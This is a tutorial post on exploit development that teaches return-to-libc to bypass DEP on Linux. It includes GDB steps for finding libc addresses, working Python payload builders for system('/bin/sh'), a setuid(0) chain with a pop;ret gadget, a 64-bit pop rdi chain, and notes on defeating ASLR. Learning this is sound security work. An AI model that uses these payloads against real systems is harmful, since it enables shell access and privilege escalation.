Bypassing DEP with Return-to-libc
Thilan Dissanayaka Exploit Development April 05, 2020

Bypassing DEP with Return-to-libc

In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP.

Now we turn DEP back on and see what happens.

DEP (Data Execution Prevention) marks the stack and heap as non-executable. Even if our shellcode lands perfectly in memory, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation. Our shellcode is dead on arrival.

Before DEP:  Stack = RWX → shellcode runs
After DEP:   Stack = RW  → "Access Violation" — can't execute data

But here’s the key insight: the code section of the executable and its loaded libraries (libc, kernel32, ntdll) are already executable. They have to be — they contain the program’s own code. What if instead of injecting new code, we just jump to code that already exists?

That’s return-to-libc — the simplest DEP bypass, and the foundation for the more advanced ROP chain technique we’ll cover in the next article.

The Idea

libc (the C standard library) is loaded into every C program’s address space. It contains thousands of useful functions — including system(), which executes a shell command.

If we can make the program call system("/bin/sh"), we get a shell. No shellcode needed. The system() function lives in an executable page (libc’s .text section), so DEP doesn’t block it.

The plan:

  1. Overflow the buffer to overwrite the return address
  2. Set the return address to the address of system() in libc
  3. Arrange the stack so that system() receives "/bin/sh" as its argument
  4. Profit

How Function Calls Work on the Stack (cdecl)

To understand ret2libc, we need to recall how functions are called in 32-bit Linux (cdecl calling convention). If you’ve read the stack and calling conventions article, this is a refresher.

When a program calls system("/bin/sh"), the stack looks like this:

Before the CALL instruction:
┌──────────────────────────┐  ← Higher addresses
│ "/bin/sh" pointer         │  ← Argument (pushed first)
├──────────────────────────┤
│ Return address            │  ← Pushed by CALL instruction
├──────────────────────────┤  ← ESP after CALL (system() starts here)
│ system()'s local frame    │
└──────────────────────────┘  ← Lower addresses

The key layout from system()’s perspective when it starts executing:

ESP →  [ return address after system() finishes ]
ESP+4  [ first argument: pointer to "/bin/sh"    ]

system() reads its argument from ESP+4 (relative to what ESP was when it started). It reads the return address from ESP.

In a normal program, the compiler handles all of this. But in our exploit, we’re not calling system() with a CALL instruction — we’re arriving at system() via a ret. That means we need to set up the stack to look exactly like a real call.

The ret2libc Stack Layout

When the vulnerable function returns, ret pops the top of the stack into EIP. If we’ve overwritten the return address with system()’s address, EIP jumps to system().

At that moment, ESP points to the next value on the stack. From system()’s perspective, the stack looks like a normal call:

Our overflow payload:
┌──────────────────────────────────────────────────────────────────┐
│ Padding (fill buffer + saved EBP) │ system() addr │ return addr │ "/bin/sh" addr │
└──────────────────────────────────────────────────────────────────┘
                                      ↑ popped into EIP by RET
                                                      ↑ ESP points here after RET
                                                                    ↑ ESP+4 = argument

After ret executes:

  • EIP = address of system() — we’re now executing system()
  • ESP points to the “return addr” slot
  • ESP+4 points to the “/bin/sh” pointer — this is system()’s first argument

system() will:

  1. Read its argument from ESP+4 → gets the address of “/bin/sh”
  2. Execute "/bin/sh" → shell spawned
  3. When it finishes, return to the address at ESP → the “return addr” slot

For the return address after system(), we use exit() so the program terminates cleanly instead of crashing.

Finding the Addresses

We need three addresses:

  1. system() in libc
  2. exit() in libc (for clean return)
  3. The string "/bin/sh" somewhere in memory

Finding system() and exit()

$ gdb ./vulnerable -q
(gdb) break main
(gdb) run
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>

Finding “/bin/sh”

Here’s a trick — libc itself contains the string “/bin/sh” (it’s used internally by system() and other functions). We can search for it:

(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf
(gdb) x/s 0xf7f588cf
0xf7f588cf: "/bin/sh"

There it is — a /bin/sh string already in libc’s data section. We don’t need to put it on the stack ourselves.

Finding the Offset

We need to know how many bytes of padding to reach the return address. Use the same cyclic pattern technique from the buffer overflow tutorial:

(gdb) run < <(python3 -c "from pwn import *; print(cyclic(200).decode())")
Program received signal SIGSEGV
(gdb) p $eip
$3 = (void *) 0x6161616c

$ python3 -c "from pwn import *; print(cyclic_find(0x6161616c))"
44

Offset to the return address: 44 bytes (this varies per binary — buffer size + saved EBP).

The Exploit

import struct

# Addresses (found with GDB — these change with ASLR disabled)
system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr   = struct.pack("<I", 0xf7e369e0)
binsh_addr  = struct.pack("<I", 0xf7f588cf)

offset = 44  # Padding to reach return address

# Stack layout:
# [padding] [system()] [exit()] ["/bin/sh"]
payload = b"A" * offset + system_addr + exit_addr + binsh_addr

with open("payload", "wb") as f:
    f.write(payload)
$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)

Shell. No shellcode. No executable stack. DEP is on. We just called a function that was already there.

Understanding Each Byte

Let’s trace through the exploit byte by byte:

Payload: AAAA...AAAA  \xa0\x2d\xe4\xf7  \xe0\x69\xe3\xf7  \xcf\x88\xf5\xf7
         ←── 44 A's ──→  ←─ system() ──→  ←── exit() ──→  ←─ "/bin/sh" ─→

Before the vulnerable function returns:

Stack:
ESP → 0xf7e42da0   ← system() address (about to be popped into EIP)
      0xf7e369e0   ← exit() address (system's "return address")
      0xf7f588cf   ← "/bin/sh" address (system's argument)

ret executes — pops into EIP:

EIP = 0xf7e42da0 (system)
ESP → 0xf7e369e0   ← system() sees this as its return address
      0xf7f588cf   ← system() sees this as its first argument (ESP+4)

system() executes:

  1. Reads ESP+4 → 0xf7f588cf → dereferences → "/bin/sh"
  2. Calls /bin/sh → shell spawned

When shell exits, system() returns:

  1. Pops ESP → 0xf7e369e0 → jumps to exit()
  2. Program terminates cleanly

Chaining Multiple Functions

What if you need to do more than just call system()? For example, call setuid(0) first (to elevate privileges in a SUID binary), then call system("/bin/sh").

The trick is managing the return address between calls. After setuid() returns, ESP points past its argument. We need to “clean up” the stack before the next function call.

The Stack Pivot Problem

After setuid(0) returns:

ESP → [setuid's argument: 0]   ← ESP is here, pointing at garbage

We need ESP to move past the argument and land on the next function’s address. The solution: a pop; ret gadget.

A pop; ret gadget does exactly what we need:

  1. pop removes one value from the stack (the used argument)
  2. ret pops the next value into EIP (the next function)
Payload for setuid(0) → system("/bin/sh"):

[padding] [setuid] [pop;ret gadget] [0] [system] [exit] ["/bin/sh"]
                    ↑ return from setuid
                                     ↑ setuid's arg (popped by gadget)
                                         ↑ popped into EIP by gadget's ret

Finding a pop; ret gadget:

$ ROPgadget --binary ./vulnerable --search "pop|ret"
0x0804856b : pop ebx ; ret

The exploit:

import struct
p = lambda x: struct.pack("<I", x)

offset    = 44
setuid    = p(0xf7e5f170)   # setuid() address
pop_ret   = p(0x0804856b)   # pop ebx; ret gadget
arg_0     = p(0x00000000)   # setuid(0)
system    = p(0xf7e42da0)   # system() address
exit_fn   = p(0xf7e369e0)   # exit() address
binsh     = p(0xf7f588cf)   # "/bin/sh" address

payload  = b"A" * offset
payload += setuid             # First call: setuid
payload += pop_ret            # Return from setuid → pop arg, then ret to next
payload += arg_0              # setuid's argument: 0
payload += system             # Second call: system
payload += exit_fn            # Return from system → exit
payload += binsh              # system's argument: "/bin/sh"

with open("payload", "wb") as f:
    f.write(payload)

This pop; ret pattern for chaining function calls is the stepping stone to full ROP. Once you start thinking in terms of “gadgets that clean up the stack and return to the next thing,” you’re already doing ROP — just with function-sized gadgets instead of instruction-sized ones.

ret2libc on 64-bit

On x86-64, function arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. So we can’t just place the argument after the function address — we need to load it into rdi first.

This requires a gadget: pop rdi; ret

$ ROPgadget --binary ./vulnerable --search "pop rdi"
0x00400753 : pop rdi ; ret
import struct
p64 = lambda x: struct.pack("<Q", x)

offset   = 72                    # Different for 64-bit
pop_rdi  = p64(0x00400753)       # pop rdi; ret
binsh    = p64(0x7ffff7f588cf)   # "/bin/sh" in libc
ret      = p64(0x00400754)       # ret (stack alignment)
system   = p64(0x7ffff7e42da0)   # system() in libc

payload  = b"A" * offset
payload += pop_rdi               # Load argument into rdi
payload += binsh                 # rdi = "/bin/sh"
payload += ret                   # Stack alignment (16-byte boundary)
payload += system                # Call system("/bin/sh")

with open("payload", "wb") as f:
    f.write(payload)

Notice the extra ret gadget before system(). On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call. If alignment is off, system() crashes on a movaps instruction. The extra ret adjusts ESP by 8 bytes to fix alignment.

This 64-bit version already looks like a ROP chain — we’re using gadgets (pop rdi; ret) to set up registers. The line between “ret2libc” and “ROP” is blurry on 64-bit systems.

The Elephant in the Room — ASLR

Everything above assumes we know the exact address of system(), exit(), and "/bin/sh". With ASLR disabled, these addresses are the same every run. With ASLR enabled, libc loads at a random base address each time.

To defeat ASLR, we need to leak a libc address at runtime — discover where libc actually loaded — and calculate our target addresses from that leak.

Common leak techniques:

  • Format string vulnerabilities%p to print stack values containing libc pointers
  • GOT/PLT leaks — If the binary has an information disclosure, read a GOT entry to get a resolved libc address
  • Partial overwrite — On 32-bit, ASLR has low entropy. The lower 12 bits of libc addresses are constant (page alignment). A 1-2 byte overwrite can redirect execution without knowing the full address.
  • Brute force (32-bit only) — With ~8-12 bits of ASLR entropy, try 256-4096 times. With a forking server, this takes seconds.

We’ll combine ret2libc with ASLR bypass techniques using format string leaks in a future article. For now, the important takeaway: ret2libc works against DEP, but not against ASLR (without an additional info leak).

Limitations of ret2libc

ret2libc gets you a shell, and that’s often enough. But it has limitations:

  1. Limited to existing functions — You can only call functions available in the binary or its libraries. Complex operations (setting up sockets, encoding data) require chaining many calls.

  2. Argument setup is awkward — On 32-bit, arguments go on the stack, which is manageable. But multi-argument functions require careful stack layout. On 64-bit, you need register-setting gadgets, which is essentially ROP.

  3. Stack cleanup between calls — Chaining multiple function calls requires pop; ret gadgets to clean up arguments between calls.

  4. Not Turing-complete — ret2libc alone can’t do arbitrary computation. You’re limited to calling existing functions with controllable arguments.

For more complex exploits — writing to arbitrary memory, setting up multiple registers, performing conditional logic — you need the full power of Return-Oriented Programming. That’s the next article.

Summary

Concept Details
The problem DEP makes stack non-executable — shellcode can’t run
The solution Don’t inject code — call functions already in libc
Key target system("/bin/sh") — spawns a shell
Stack layout [padding] [system] [exit] ["/bin/sh"]
Finding addresses GDB: p system, p exit, find "/bin/sh"
Chaining calls Use pop; ret gadgets between functions
64-bit difference Arguments in registers — need pop rdi; ret gadget
Limitation ASLR breaks it (need info leak to find libc addresses)

ret2libc is the gateway to modern exploitation. It introduced the core idea — reuse existing code instead of injecting your own — and paved the way for ROP, which generalizes this concept to arbitrary computation.

Happy reversing!

ALSO READ
Blockchain 0x000 – Understanding the Fundamentals
May 21, 2020 Web3 Development

Imagine a world where strangers can exchange money, share data, or execute agreements without ever needing to trust a central authority. No banks, no intermediaries, no single point of failure yet...

Identity and Access Management (IAM)
May 11, 2020 Identity & Access Management

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

How I built a web based CPU Simulator
May 07, 2020 Pet Projects

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...

Writing a Shell Code for Linux
Apr 21, 2020 Exploit Development

Shellcode is a small piece of machine code used as the payload in exploit development. In this post, we write Linux shellcode from scratch — starting with a simple exit, building up to spawning a shell, and explaining every decision along the way.

Exploiting a Stack Buffer Overflow on Windows
Apr 12, 2020 Exploit Development

In a previous tutorial we discusses how we can exploit a buffer overflow vulnerability on a Linux machine. I wen through all theories in depth and explained each step. Now today we are going to jump...

Access Control Models
Apr 08, 2020 Identity & Access Management

Access control is one of the most fundamental concepts in security. Every time you set file permissions, assign user roles, or restrict access to a resource, you're implementing some form of access control. But not all access control is created equal...

Exploiting a  Stack Buffer Overflow  on Linux
Apr 01, 2020 Exploit Development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Basic concepts of Cryptography
Mar 01, 2020 Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Common Web Application Attacks
Feb 05, 2020 Application Security

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Remote Code Execution (RCE)
Jan 02, 2020 Application Security

Remote Code Execution (RCE) is the holy grail of application security vulnerabilities. It allows an attacker to execute arbitrary code on a remote server — and the consequences are as bad as it sounds. In this post, we'll go deep into RCE across multiple languages, including PHP, Java, Python, and Node.js.